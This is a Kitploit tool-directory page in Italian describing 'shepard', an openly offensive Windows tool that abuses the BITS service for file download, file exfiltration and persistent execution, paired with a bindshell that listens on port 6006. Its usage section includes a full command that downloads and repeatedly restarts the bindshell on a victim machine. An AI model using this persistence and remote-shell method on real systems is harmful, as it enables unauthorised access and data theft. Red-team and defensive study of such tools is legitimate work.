Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
shepard — Strumento persistente di download/upload/esecuzione in corso che utilizza Windows BITS. | Kitploit
Strumenti/GitHubGitHub/d3adzo/shepard
Meccanismi di PersistenzaEsfiltrazione DatiPost-ExploitCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubd3adzo/shepard

shepard

Strumento persistente di download/upload/esecuzione in corso che utilizza Windows BITS.

Vedi Repository
4134 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SHEPARD

BITS

Questo è uno strumento di persistenza che utilizza il servizio BITS (Background Intelligent Transfer Service) di Windows.

Funzionalità

Download di file, esfiltrazione di file, download di file + esecuzione persistente

Utilizzo

Esegui shepard.exe come amministratore con i seguenti argomenti della riga di comando:

-d <remoteLocation> <writePath> : download normale di un file in un percorso locale a tua scelta

-e <remoteLocation> <localPath> : caricamento normale di un file da un percorso locale a tua scelta (invia solo a server IIS, questa è una limitazione di BITS)

-dr <remoteLocation> <writePath> [optionalFileArgs] : download di un file in un percorso a tua scelta, e tenterà di mantenere la persistenza. Il file scaricato tenterà di essere eseguito con eventuali argomenti facoltativi e BITS controllerà ogni 30 secondi per assicurarsi che il file sia ancora in esecuzione sul sistema compromesso.

Eseguire questo eseguibile senza argomenti o con un numero errato di argomenti causerà la terminazione pulita di shepard.

BINDSHELL

Il server (vittima) è scritto in C#. Ascolta sulla porta 6006.

Utilizzo vittima

Esegui shepardsbind_serv.exe senza argomenti.

Il client (attaccante) è scritto in Python e accetta un argomento: l'indirizzo IP della macchina della vittima.

Utilizzo server

shepardsbind_recv.py <IP della vittima>

Eseguire shepardsbind_recv.py senza argomenti restituirà un errore.

Utilizzarli insieme

L'unico eseguibile che deve essere sulla macchina della vittima è shepard.exe. Ospita l'eseguibile bindshell da scaricare in un luogo accessibile pubblicamente. Shepard scaricherà ed eseguirà l'eseguibile bindshell, e l'utente potrà ora utilizzare il ricevitore python. Se la shell viene trovata e uccisa, si riavvierà dopo 30 secondi.

Esempio: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe

Scarica lo strumento